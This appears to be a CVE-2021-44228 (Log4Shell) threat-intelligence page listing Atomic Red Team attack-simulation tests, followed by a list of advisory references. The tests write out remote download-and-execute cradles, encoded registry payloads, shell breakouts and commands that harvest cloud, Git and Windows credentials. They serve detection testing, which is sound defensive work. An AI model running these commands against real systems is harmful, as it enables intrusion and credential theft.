Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that art-marker.txt is in the folder.
Command (PowerShell)
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
T1059.001 PowerShell Invoke Known Malicious Cmdlets Windows PowerShell Privileged
Powershell execution of known Malicious PowerShell Cmdlets
Command (PowerShell)
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
    "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
    $cmdlets}
T1059.001 PowerShell Session Creation and Use Windows PowerShell Privileged
Connect to a remote powershell session and interact with the host. Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.
Command (PowerShell)
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
T1059.001 PowerUp Invoke-AllChecks Windows PowerShell
Check for privilege escalation paths using PowerUp from PowerShellMafia
Command (PowerShell)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
T1059.001 Powershell Invoke-DownloadCradle Windows Manual
Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
T1059.001 Powershell MsXml COM object - with prompt Windows CMD
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed. Provided by https://github.com/mgreen27/mgreen27.github.io
Command (CMD)
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
T1059.001 Powershell XML requests Windows CMD
Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed. Provided by https://github.com/mgreen27/mgreen27.github.io
Command (CMD)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
T1059.001 Powershell invoke mshta.exe download Windows CMD
Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!". Provided by https://github.com/mgreen27/mgreen27.github.io
Command (CMD)
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
T1059.001 Run BloodHound from local disk Windows PowerShell
Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur. Successful...
Command (PowerShell)
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
T1059.001 Run Bloodhound from Memory using Download Cradle Windows PowerShell
Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur. Successful execution...
Command (PowerShell)
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
T1059.001 SOAPHound - Build Cache Windows PowerShell
Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename. src: https://github.com/FalconForceTeam/SOAPHound
Command (PowerShell)
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
T1059.001 SOAPHound - Dump BloodHound Data Windows PowerShell
Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory. src: https://github.com/FalconForceTeam/SOAPHound
Command (PowerShell)
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1087.002 Account Enumeration with LDAPDomainDump Linux Shell
This test uses LDAPDomainDump to perform account enumeration on a domain. [Reference](https://securityonline.info/ldapdomaindump-active-directory-information-dumper-via-ldap/)
Command (Shell)
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
T1087.002 Active Directory Domain Search Linux Shell
Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory
Command (Shell)
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
T1087.002 Adfind - Enumerate Active Directory Admins Windows CMD
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/,...
Command (CMD)
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
T1087.002 Adfind - Enumerate Active Directory Exchange AD Objects Windows CMD
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/,...
Command (CMD)
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
T1087.002 Adfind - Enumerate Active Directory User Objects Windows CMD
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/,...
Command (CMD)
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
T1087.002 Adfind -Listing password policy Windows CMD
Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/,...
Command (CMD)
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
T1087.002 Automated AD Recon (ADRecon) Windows PowerShell
ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed.
Command (PowerShell)
Invoke-Expression "#{adrecon_path}"
T1087.002 Enumerate Active Directory Users with ADSISearcher Windows PowerShell
The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference:...
Command (PowerShell)
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
T1087.002 Enumerate Active Directory for Unconstrained Delegation Windows PowerShell
Attackers may attempt to query for computer objects with the UserAccountControl property 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set More Information -...
Command (PowerShell)
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
T1087.002 Enumerate Default Domain Admin Details (Domain) Windows CMD
This test will enumerate the details of the built-in domain admin account
Command (CMD)
net user administrator /domain
T1087.002 Enumerate Linked Policies In ADSISearcher Discovery Windows PowerShell
The following Atomic test will utilize ADSISearcher to enumerate organizational unit within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference:...
Command (PowerShell)
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
T1087.002 Enumerate Root Domain linked policies Discovery Windows PowerShell
The following Atomic test will utilize ADSISearcher to enumerate root domain unit within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference:...
Command (PowerShell)
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
T1087.002 Enumerate all accounts (Domain) Windows CMD
Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session
Command (CMD)
net user /domain
net group /domain
T1087.002 Enumerate all accounts via PowerShell (Domain) Windows PowerShell
Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
Command (PowerShell)
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
T1087.002 Enumerate logged on users via CMD (Domain) Windows CMD
Enumerate logged on users. Upon exeuction, logged on users will be displayed.
Command (CMD)
query user /SERVER:#{computer_name}
T1087.002 Get-DomainUser with PowerView Windows PowerShell
Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
Command (PowerShell)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
T1087.002 Kerbrute - userenum Windows PowerShell
Enumerates active directory usernames using the userenum function of Kerbrute
Command (PowerShell)
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
T1087.002 Suspicious LAPS Attributes Query with Get-ADComputer all properties Windows PowerShell
This test executes LDAP query using powershell command Get-ADComputer and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Command (PowerShell)
Get-ADComputer #{hostname} -Properties *
T1087.002 Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope Windows PowerShell
This test executes LDAP query using powershell command Get-ADComputer with SearchScope as subtree and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Command (PowerShell)
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
T1087.002 Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property Windows PowerShell
This test executes LDAP query using powershell command Get-ADComputer and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Command (PowerShell)
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
T1087.002 Suspicious LAPS Attributes Query with adfind all properties Windows PowerShell
This test executes LDAP query using adfind command and lists all the attributes including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Command (PowerShell)
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
T1087.002 Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd Windows PowerShell
This test executes LDAP query using adfind command and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Command (PowerShell)
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
T1087.002 Wevtutil - Discover NTLM Users Remote Windows PowerShell
This test discovers users who have authenticated against a Domain Controller via NTLM. This is done remotely via wmic and captures the event code 4776 from the domain controller and stores the ouput in C:\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)
Command (PowerShell)
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
T1087.002 WinPwn - generaldomaininfo Windows PowerShell
Gathers general domain information using the generaldomaininfo function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (53)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
logging.apache.org
GitHub CVE
https://logging.apache.org/log4j/2.x/security.html
openwall.com
GitHub CVE mailing-list
http://www.openwall.com/lists/oss-security/2021/12/10/1
openwall.com
GitHub CVE mailing-list
http://www.openwall.com/lists/oss-security/2021/12/10/2
tools.cisco.com
GitHub CVE vendor-advisory
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
openwall.com
GitHub CVE mailing-list
http://www.openwall.com/lists/oss-security/2021/12/10/3
security.netapp.com
GitHub CVE
https://security.netapp.com/advisory/ntap-20211210-0007/
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html
psirt.global.sonicwall.com
GitHub CVE
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032
oracle.com
GitHub CVE
https://www.oracle.com/security-alerts/alert-cve-2021-44228.html
debian.org
GitHub CVE vendor-advisory
https://www.debian.org/security/2021/dsa-5020
lists.debian.org
GitHub CVE mailing-list
https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html
lists.fedoraproject.org
GitHub CVE vendor-advisory
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/
msrc-blog.microsoft.com
GitHub CVE vendor-advisory
https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/
openwall.com
GitHub CVE mailing-list
http://www.openwall.com/lists/oss-security/2021/12/13/2
openwall.com
GitHub CVE mailing-list
http://www.openwall.com/lists/oss-security/2021/12/13/1
openwall.com
GitHub CVE mailing-list
http://www.openwall.com/lists/oss-security/2021/12/14/4
kb.cert.org
GitHub CVE third-party-advisory
https://www.kb.cert.org/vuls/id/930724
twitter.com
GitHub CVE
https://twitter.com/kurtseifried/status/1469345530182455296
cert-portal.siemens.com
GitHub CVE
https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html
intel.com
GitHub CVE
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html
openwall.com
GitHub CVE mailing-list
http://www.openwall.com/lists/oss-security/2021/12/15/3
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html
cert-portal.siemens.com
GitHub CVE
https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf
lists.fedoraproject.org
GitHub CVE vendor-advisory
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html
cert-portal.siemens.com
GitHub CVE
https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf
cert-portal.siemens.com
GitHub CVE
https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf
oracle.com
GitHub CVE
https://www.oracle.com/security-alerts/cpujan2022.html
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html
github.com
GitHub CVE
https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html
seclists.org
GitHub CVE mailing-list
http://seclists.org/fulldisclosure/2022/Mar/23
bentley.com
GitHub CVE
https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001
github.com
GitHub CVE
https://github.com/cisagov/log4j-affected-db
support.apple.com
GitHub CVE
https://support.apple.com/kb/HT213189
oracle.com
GitHub CVE
https://www.oracle.com/security-alerts/cpuapr2022.html
github.com
GitHub CVE
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228
nu11secur1ty.com
GitHub CVE
https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html
seclists.org
GitHub CVE mailing-list
http://seclists.org/fulldisclosure/2022/Jul/11
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html
seclists.org
GitHub CVE mailing-list
http://seclists.org/fulldisclosure/2022/Dec/2
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html
cisa.gov
NVD API Third Party Advisory US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-44228